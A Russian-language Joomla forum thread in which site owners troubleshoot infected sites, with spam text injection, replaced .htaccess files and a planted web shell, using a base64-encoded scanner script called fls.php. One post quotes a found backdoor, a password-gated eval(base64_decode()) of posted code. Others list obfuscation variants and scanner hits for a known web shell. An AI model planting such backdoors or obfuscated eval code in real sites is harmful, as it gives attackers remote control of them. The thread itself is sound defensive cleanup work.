0 Пользователей и 1 Гость просматривают эту тему.
  • 299 Ответов
  • 170081 Просмотров
*

Vasiliy111

  • Захожу иногда
  • 248
  • 5 / 0
Скачал, положил в корень, вызвал  сайт/fls.php

после проверки получил:
Спойлер
[свернуть]

Подскажите пожалуйста, что значат эти строки ?
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
не хватило времени на сканирование
Добавь в .htaccess
Код
php_value max_execution_time 1000
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
Подскажите пожалуйста, что значат эти строки ?
это значит, что надо проверить эти файлы
кроме файла сканера
*

xaocbozzz

  • Захожу иногда
  • 205
  • 8 / 0
  • Котэ просит! Не обижайте котэ!
Друзья! Помогите избавиться от гадости, которая терроризирует меня уже неделю.
Симптомы: появление текста на сайте с ссылками на забугорском языке. Текст всегда появляется вверху материала (материал сдвигается вниз). Текст появляется не во всех материалах (произвольно). Есть временный способ убрать текст. Описан тут ниже.
Вот скриншот:
Спойлер
[свернуть]
Что я успел сделать:
- убрал галки "сохранить пароль" во всех ftp клиентах: filezilla, total commander
- нашел пару файлов с названием thumbs.php со строкой (ниже). Файлы убил.
Код
<?php if(md5($_POST["password"])=="f2bb400a3ca9dc8a5590379a67872892"){eval(base64_decode($_POST["code"]));} ?>
- взял, используемый тут, fls.php. Получил список (под спойлером). Список почистил от самого fls.php
Спойлер
[свернуть]
Список внушительный...
- поудалял неиспользуемые расширения для Joomla
- скопировал сайт и проверил его антивирусами: Nod, Comodo Internet Security (все базы свежие). Ничего не нашлось
- провел поиск по тексту "eval(base64"
- добавил в каждую (!) папку файл index.html с текстом "<html><body bgcolor="#FFFFFF"></body></html>". Убил на это три часа.
- защитил админку с помощью plgSystemJSecure-1.0.7
- поменял пароли на довольно сложные к FTP и mysql. Также поменял пароль на админку.
- обратился к хостеру насчет прав на папки/файлы. Сам назначить не могу, поэтому жду ответа.

Расширения уже давно не обновлял и не устанавливал.
Joomla 1.5.12, переход на более свежий движок исключен: было сделано много изменений вручную в файлах Joomla и вспомнить что и где - невозможно.
Интересный момент: когда захожу в материал, где есть проявление этого гада, и пересохраняю его без изменений: зловредный текст пропадает на всех страницах. И проявляет себя по разному (в среднем раз в 6-24 часа). Надо бы еще проследить зависимость...
Имеется автоматически настроенная выгрузка из 1С (7.7) в базу сайта раз в день с другого компьютера. Сегодня сделаю наблюдение: на этом ли этапе происходит внедрение кода.
В последнее время, как я уже писал выше, ничего не устанавливалось. Делались лишь множественные правки вручную в шаблоне и в других файлах для повышения функциональности.
Был подключен чат от siteheart, но он был подключен достаточно давно, а вирус объявился недавно. Неужели он?
Где-то три месяца назад началась рассылка спама через уязвимость в стандартной форме "задать вопрос о товаре". Форма была убрана из шаблона. Стоить заметить - спам приходит, но реже. Скорее всего мой адрес уже у спамеров в базе.

Итак, требуется помощь от сообщества Joomla. Нужно удавить эту дрянь на корню и помочь другим с подобной проблемой.

*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Одного не понимаю с какого перепуга вы решили  что base64_decode должно быть именно так eval(base64
может быть и так
Код
$xxxxxxxxxx ='0JfQtNC10YHRjCDQt9Cw0LrQvtC00LjRgNC+0LLQsNC90L3Ri9C5INGC0LXQutGB0YI=';
echo base64_decode($xxxxxxxxxx);
и так
Код
<? eval(gzuncompress(base64_decode('0JfQtNC10YHRjCDQt9Cw0LrQvtC00LjRgNC+0LLQsNC90L3Ri9C5INGC0LXQutGB0YI=
и так
Код
eval(gzinflate(str_rot13(base64_decode(...)))
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
xaocbozzz
По списку сканера -ничего опасного не вижу.thumbs.php-это правильно.
Я всегда  ищу base64_decode
*

xaocbozzz

  • Захожу иногда
  • 205
  • 8 / 0
  • Котэ просит! Не обижайте котэ!
Хм. В общем с самого утра, после того, как я "подчистил" следы вируса - полет нормальный. Проверяю сайт каждые 20 минут, а также после использовании какого-либо ftp-клиента или проги для работы с базой.
Скоро попробую сделать выгрузку с 1С. Посмотрим, что из этого вырастет.
*

vitmail99

  • Захожу иногда
  • 67
  • 2 / 2
спасибо за скрипт! эта штука отличный помошник!
*

vitmail99

  • Захожу иногда
  • 67
  • 2 / 2
Вычистил свои сайты с помощью вашего скрипта, но осталась одна проблема: каким-то образом, каждый день у меня заменяется фаил .htaccess на всех сайтах и соответственно сайты падают, все сайты на одном хостинге, под одним аккаунтом. Все пароли менял уже 3 раза, ни в каких менеджерах их не сохраняю. Менял даже хостинг, не помогло. Все сайты: Joomla 1.5.25 + VirtueMart 1.1.9
Помогите, пожалуйста, решить проблему. Пример .htaccess (испорченный) можно скачать здесь: lover-shop.ru/hta.rar

P.S. ваш скрипт выдает много ссылок на фаилы содержащие строки: $_POST[ и confirm(
Часть из них я проверял, вроде все ок, но их просто не реально все проверить! Что с этим делать?
*

xaocbozzz

  • Захожу иногда
  • 205
  • 8 / 0
  • Котэ просит! Не обижайте котэ!
Итак, посидев пару суток и наблюдая за вируснёй, я выяснил, что:
- выгрузка из 1С совершенно не при чем.
- вирус не подвергается временному анализу: его признаки могут появиться и сейчас и через два дня.
- все, что я описывал выше - не помогло
- поискал в Инете подобные сканеры, но все что находил - не работало
Я в замешательстве... единственный оставшийся вариант - отключить все расширения для Joomla и включать по одному (или все наоборот). И наблюдать, когда появиться гаденыш. Только вот даже если брать из расчета 3 дня на каждое расширение... выходит цельных пару месяцев... Ну и естественно о нормальной работе сайта на этот период можно забыть...
*

MaxFarSeer

  • Захожу иногда
  • 384
  • 29 / 0
  • http://ru.ah.fm:80
xaocbozzz, а вы к про не обращались? Возможно затраты окупятся быстрым излечением?
Не можете найти, где редактировать код? Читаем:
Быстрый и легкий поиск нужных файлов для редактирования чего-либо

Я много времени потратил на изменение готовых шаблонов, раскуривание чего и как там у буржуев, менял код вложенный в 100500 дивов, да они неплохи эти T3 и Warp (YOO), но стоит начать делать свой шаблон...Ребята!!! Всем советую! Свое - так легко настраивать!
*

wishlight

  • Живу я здесь
  • 4975
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
В 1.5.12 есть большая уязвимость, насколько я помню. Обновляйте ядро и ищите шелл. Или латайте Может оно
*

wishlight

  • Живу я здесь
  • 4975
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
А нет.. Вход закрыт. Сайт я сам нашел какой. Дырка не там.

Офигенно нагадили

« Последнее редактирование: 16.04.2012, 18:36:11 от wishlight »
*

xaocbozzz

  • Захожу иногда
  • 205
  • 8 / 0
  • Котэ просит! Не обижайте котэ!
Вот вот. Что с этой заразой сделать?
*

xaocbozzz

  • Захожу иногда
  • 205
  • 8 / 0
  • Котэ просит! Не обижайте котэ!
xaocbozzz, а вы к про не обращались? Возможно затраты окупятся быстрым излечением?
Ну я все-таки верю в то, что на форуме есть люди, готовые помочь советом. Сам тут помогаю людям как могу и денег не требую. Хочется вникнуть в проблему и разобраться. А не просто отдать кому-то денег и не знать, что это было. Вознаградить за оказанную помощь - не проблема. Главное, чтобы в нужном направлении меня направили.
*

xaocbozzz

  • Захожу иногда
  • 205
  • 8 / 0
  • Котэ просит! Не обижайте котэ!
...Обновляйте ядро...
Для меня это последнее на что я могу пойти. Неужели это единственный выход? Если однозначно - да, тогда я не завидую себе, потому что предстоящий объем работ меня пугает.
*

xaocbozzz

  • Захожу иногда
  • 205
  • 8 / 0
  • Котэ просит! Не обижайте котэ!
Вирус все еще на месте... Почему, когда захожу в любой материал и пересохраняю его (без изменений) - текст вируса пропадает. (потом вновь появляется?)
*

MaxFarSeer

  • Захожу иногда
  • 384
  • 29 / 0
  • http://ru.ah.fm:80
он появляется внось, потому что рассадник заразы сидит на сайте/хостинге (даже в другой папке на хостинге вполне может сидеть) и вновь внедряет свой код по истечении определенного времени.
Не можете найти, где редактировать код? Читаем:
Быстрый и легкий поиск нужных файлов для редактирования чего-либо

Я много времени потратил на изменение готовых шаблонов, раскуривание чего и как там у буржуев, менял код вложенный в 100500 дивов, да они неплохи эти T3 и Warp (YOO), но стоит начать делать свой шаблон...Ребята!!! Всем советую! Свое - так легко настраивать!
*

xaocbozzz

  • Захожу иногда
  • 205
  • 8 / 0
  • Котэ просит! Не обижайте котэ!
хм. Кажется я напал на след. В кэше Joomla нашел php файлы, которые содержат текст вируса. Затем вспомнил, что совершенно недавно я включил встроенный кэш Joomla (который все время был отключен). Сейчас очистил кэш и вуаля - текст исчез. Теперь отключаю кэш и жду пару дней... Кстати вопрос наперед: что делать, если мне нужен кэш?
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Перезалей кэш только мало вероятно что это дело в кэше
----------------
Ты переименовал htaccess.txt в .htaccess ?
Ты закинул .htaccess в папку с картинками ?

P.S. Ищи во всем том что ты мне не скинул, а по твоим словам это картинки но по ошибкам я вижу что это еще и mod_city_rate,
возможно еще что то я не собираюсь копаться в ошибках и отслеживать что ты там мне не скинул.
Если ты считаешь что картинки не представляют опасности то ты глубоко ошибаешься, берешь картинку gif или png формата открываешь ее в  текстовом редакторе типа Notepad++ и вписываешь туда код, и вуаля (раньше uCoz через аватарки так взламывали )))
« Последнее редактирование: 23.04.2012, 10:12:32 от oriol »
*

xaocbozzz

  • Захожу иногда
  • 205
  • 8 / 0
  • Котэ просит! Не обижайте котэ!
...
Ты переименовал htaccess.txt в .htaccess ?
Ты закинул .htaccess в папку с картинками ?
...
Да, это я сделал. Но дело действительно было в кэше. После того, как я его вырубил - все исчезло.

Хочу выразить огромную благодарность oriol и flyingspook за отзывчивость и помощь в моей проблеме. Ставлю вам +

ps. Только вот что с кэшем то теперь делать?
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Кэш не при делах все там на месте
Самое интересное что Firefox эту хрень грузит а Chrome нет )) (у меня)
И у скриптов все запросы местные кроме одного http://xslt.alexa.com/site_stats/js/s/a?url=******.ru
Спойлер
[свернуть]
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Сканер полностью закодирован в base64 вопросов по этому поводу просьба не задовать
*

playtoppokerru

  • Осваиваюсь на форуме
  • 30
  • 0 / 0
Здравствуйте.
Стали появляться SEO статьи на моем сайте, которые я не размещал.
Запустил сканер.
В результатах сканирования нашел:
Код
File: /home/p/pm100/pokermastera.ru/public_html/components/com_acymailing/sh.php
String:: Web Shell by oRb

File: /home/p/pm100/pokermastera.ru/public_html/components/com_acymailing/sh.php
String:: default_action = 'FilesMan'

Удалил (переименовал) этот sh.php.

Кроме того, встречаются строки типа:
Код
File: /home/p/pm100/pokermastera.ru/public_html/components/com_acymailing/views/newsletter/view.html.php
String:: confirm(
Настораживает двойное расширение: view.html.php
или это нормально? Что еще можно сделать.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу

Удалил (переименовал) этот sh.php.

Настораживает двойное расширение: view.html.php
или это нормально? Что еще можно сделать.
index.html положи в папку,где переименованный скрипт sh.php.
view.html.php - это норма
*

playtoppokerru

  • Осваиваюсь на форуме
  • 30
  • 0 / 0
index.html положи в папку,где переименованный скрипт sh.php.
view.html.php - это норма
Извиняюсь, не понял, какой index.html. В той папке где лежит переименованный скрипт (я его никуда не перемещал, только сменил имя и расширение) есть index.html
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Ну тогда,норма.Хотя почему не удалить переименованный скрипт,или хотя бы написать приветствие с пожеланием.
*

playtoppokerru

  • Осваиваюсь на форуме
  • 30
  • 0 / 0
Удалил, но вообще-то не помогло, сегодня появилась новая статья. Нужно искать дальше, а как не знаю:(((
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 243460
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 1226
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 473
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1069
Последний ответ 03.11.2020, 17:36:03
от Cedars
Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

Ответов: 18
Просмотров: 4380
Последний ответ 28.08.2020, 22:00:30
от cntrl